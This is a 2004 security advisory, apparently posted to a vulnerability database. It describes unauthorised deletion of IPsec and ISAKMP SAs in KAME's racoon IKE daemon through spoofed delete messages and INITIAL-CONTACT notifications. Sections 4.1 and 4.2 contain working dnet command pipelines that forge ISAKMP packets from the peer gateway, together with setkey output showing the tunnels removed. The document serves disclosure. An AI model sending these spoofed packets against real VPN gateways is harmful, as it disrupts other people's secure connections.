unauthorized deletion of IPsec (and ISAKMP) SAs in racoon

2004-01-14T00:00:00
ID SECURITYVULNS:DOC:5632
Type securityvulns
Reporter Securityvulns
Modified 2004-01-14T00:00:00

Description

0 Preface

Now that most bugs in isakmpd that allowed for unauthorized SA deletion are "fixed", it's time to release some information on racoon.

By the way: About 5 months ago I tried to contact the KAME developers.

1 Description

racoon, KAME's IKE daemon, contains some flaws, that allow for unauthorized deletion of IPsec (and ISAKMP) SAs.

2 Description

2.1 racoon's "authentication" of delete messages

When racoon receives a delete message containing the initiator
cookie of a main/aggressive/base mode, that has not yet setup a
ISAKMP SA, it fulfills the request, if the message also includes a
(dummy) hash payload and originates from the right IP address. See
isakmp_main() in isakmp.c and purge_isakmp_spi(), purge_ipsec_spi(),
isakmp_info_recv() and isakmp_info_recv_d() in isakmp_inf.c for
details and amusement.

2.2 INITIAL-CONTACT with racoon

It is nearly the same with INITIAL-CONTACT notifications, but there
is no need of a (dummy) hash payload and it's way more effective,
because it deletes all IPsec SAs "relatived to the destination
address". See isakmp_info_recv_n() and info_recv_initialcontact() in
isakmp_inf.c for additional information.

3 Affected Systems

All versions of racoon are affected.

4 Leveraging the Issues ..

Take a look at http://securityfocus.com/archive/1/348637 for the assumed scenario.

4.1 .. using delete messages

An IPsec tunnel between vpn-gw-a and vpn-gw-a is established:

  vpn-gw-a# setkey -D 
  <vpn-gw-a's IP address> <vpn-gw-b's IP address>
          esp mode=tunnel spi=4127562105(0xf6059979) reqid=0(0x00000000)
          [..]
  <vpn-gw-b's IP address> <vpn-gw-a's IP address>
          esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
          [..]

The attacker launches step 1 of his attack. He pretends to initiate a
phase 1 exchange (with spoofed source IP address, of course):

  attacker# dnet hex \
  >   "\x17\x17\x17\x17" \
  >   "\x17\x17\x17\x17" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x01\x10\x02\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x48" \
  >     "\x00\x00\x00\x2c" \
  >     "\x00\x00\x00\x01" \
  >     "\x00\x00\x00\x01" \
  >       "\x00\x00\x00\x20" \
  >       "\x01\x01\x00\x01" \
  >         "\x00\x00\x00\x18" \
  >         "\x00\x01\x00\x00" \
  >         "\x80\x01\x00\x05" \
  >         "\x80\x02\x00\x02" \
  >         "\x80\x03\x00\x01" \
  >         "\x80\x04\x00\x02" |
  pipe> dnet udp sport 500 dport 500 |
  pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
  pipe pipe pipe> dnet send

If racoon finds the included proposal acceptable it creates a state.
Now the attacker carries out step 2:

  attacker# dnet hex \
  >   "\x17\x17\x17\x17" \
  >   "\x17\x17\x17\x17" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x08\x10\x05\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x30" \
  >     "\x0c\x00\x00\x04" \
  >     "\x00\x00\x00\x10" \
  >     "\x00\x00\x00\x01" \
  >     "\x03\x04\x00\x01" \
  >     "\xf6\x05\x99\x79" |
  pipe> dnet udp sport 500 dport 500 |
  pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
  pipe pipe pipe> dnet send

It seems that racoon knows the attacker ;-):

  vpn-gw-a# setkey -D
  <vpn-gw-b's IP address> <vpn-gw-a's IP address>
          esp mode=tunnel spi=111058204(0x069e9d1c) reqid=0(0x00000000)
          [..]

Note: You can also delete ISAKMP SAs.

4.2 .. using INITIAL-CONTACT

The IPsec tunnel is up an running:

  vpn-gw-a# setkey -D
  <vpn-gw-a's IP address> <vpn-gw-b's IP address>
          esp mode=tunnel spi=785352974(0x2ecf890e) reqid=0(0x00000000)
          [..] 
  <vpn-gw-b's IP address> <vpn-gw-a's IP address>
          esp mode=tunnel spi=183367627(0x0aedf7cb) reqid=0(0x00000000)
          [..]

Again the attacker does step 1 and injects an ISAKMP message like
this:

  attacker# dnet hex \
  >   "\x17\x17\x17\x17" \
  >   "\x17\x17\x17\x17" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x0b\x10\x05\x00" \
  >   "\x00\x00\x00\x00" \
  >   "\x00\x00\x00\x28" \
  >     "\x00\x00\x00\x0c" \
  >     "\x00\x00\x00\x01" \
  >     "\x01\x00\x60\x02" |
  pipe> dnet udp sport 500 dport 500 |
  pipe pipe> dnet ip proto udp src vpn-gw-b dst vpn-gw-a |
  pipe pipe pipe> dnet send

racoon blindly obeys the attacker's command:

  vpn-gw-a# setkey -D
  No SAD entries.
  1. Bug fixes

There are no bug fixes.

Thomas Walpuski